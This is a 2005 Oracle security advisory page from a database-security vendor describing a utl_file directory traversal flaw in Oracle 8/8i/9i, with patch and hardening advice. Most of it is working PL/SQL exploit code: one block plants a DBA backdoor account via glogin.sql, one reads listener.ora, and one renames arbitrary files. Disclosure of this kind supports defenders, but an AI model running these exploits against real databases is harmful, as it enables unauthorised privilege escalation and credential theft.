Red-Database-Security GmbH is specialized in Oracle Security

Products
Repscan 2.5
Hedgehog Enterprise
Checkpwd (free)

Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
Oracle Exploit Directory Traversal via utl_file

Name Oracle Directory Traversal via utl_file
Systems Affected Oracle 8 / 8i / 9i
Severity Medium Risk
Category Directory Traversal
Vendor URL http://www.oracle.com/
Credit Cesar Cerrudo / Pete Finnigan
Exploit http://www.argeniss.com
Date 05 May 2005 (V 1.00)

Details

By using directory traversal it is possible to read, write or rename files on the database server.
With this technique it is possible to become DBA (via glogin.sql /login.sql), to read passwords
(e.g. mod_plsql, listener.ora), ... . In older database versions it is also possible to use the "..\" syntax.

Keep in mind NEVER to set the init.ora parameter "utl_file_dir=*" or to grant the privilege
"CREATE ANY DIRECTORY" to PUBLIC.


Example
--Create a file mytextfile.txt in the same directory referenced by MEDIA_DIR directory object.
declare
f utl_file.file_type;
begin
f:=UTL_FILE.FOPEN ('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\glogin.sql','w',1000);
UTL_FILE.PUT_LINE (f,'CREATE USER HACKER IDENTIFIED BY HACKER;',TRUE);
UTL_FILE.PUT_LINE (f,'GRANT DBA TO HACKER;',TRUE);
UTL_FILE.FCLOSE(f);
end;

--Read arbitrary files in the same drive as the directory referenced by MEDIA_DIR directory object.
SET SERVEROUTPUT ON
declare
f utl_file.file_type;
sBuffer Varchar(8000);
begin
f:=UTL_FILE.FOPEN ('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\oracle\ora92\network\ADMIN\listener.ora','r');
loop
UTL_FILE.GET_LINE (f,sBuffer);
DBMS_OUTPUT.PUT_LINE(sBuffer);
end loop;
EXCEPTION
when no_data_found then
UTL_FILE.FCLOSE(f);
end;

--Rename any file in the same drive as the directory referenced by MEDIA_DIR directory object
begin
UTL_FILE.frename('MEDIA_DIR','\\.\\..\\.\\..\\.\\myoldtextfile.txt','MEDIA_DIR','\\.\\..\\.\\..\\.\\mynewtextfile.txt',TRUE);
end;


Patch Information
Apply the latest patchsets for Oracle alert 68 or later.



2005 by Red-Database-Security GmbH - last update 02-nov-2005

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.